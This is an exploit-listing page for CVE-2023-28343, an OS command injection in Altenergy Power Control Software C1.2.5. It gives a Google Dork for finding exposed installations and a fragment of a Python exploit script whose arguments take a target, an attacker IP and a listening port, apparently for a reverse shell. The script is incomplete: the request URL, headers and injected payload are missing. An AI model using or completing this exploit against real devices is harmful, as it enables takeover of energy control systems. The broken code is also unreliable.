Altenergy power control software c1.2.5 os command injection Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-04-08 |
Type : webapps |
Platform : hardware
This exploit / vulnerability Altenergy power control software c1.2.5 os command injection is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Altenergy Power Control Software C1.2.5 - OS command injection
# Google Dork: intitle:"Altenergy Power Control Software"
# Date: 15/3/2023
# Exploit Author: Ahmed Alroky
# Vendor Homepage: https://apsystems.com/
# Version: C1.2.5
# Tested on: Windows 10
# CVE : CVE-2023-28343
response = requests.post(url, headers=headers, data=data)
# print(response.text)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Parse target, attacker,
and port.',)
parser.add_argument('--target','-t', type=str, help='The target IP
address or hostname. example : http://192.168.254')
parser.add_argument('--attacker','-a', type=str, help='The attacker IP
address or hostname.')
parser.add_argument('--port', '-p',type=int, help='Listening port')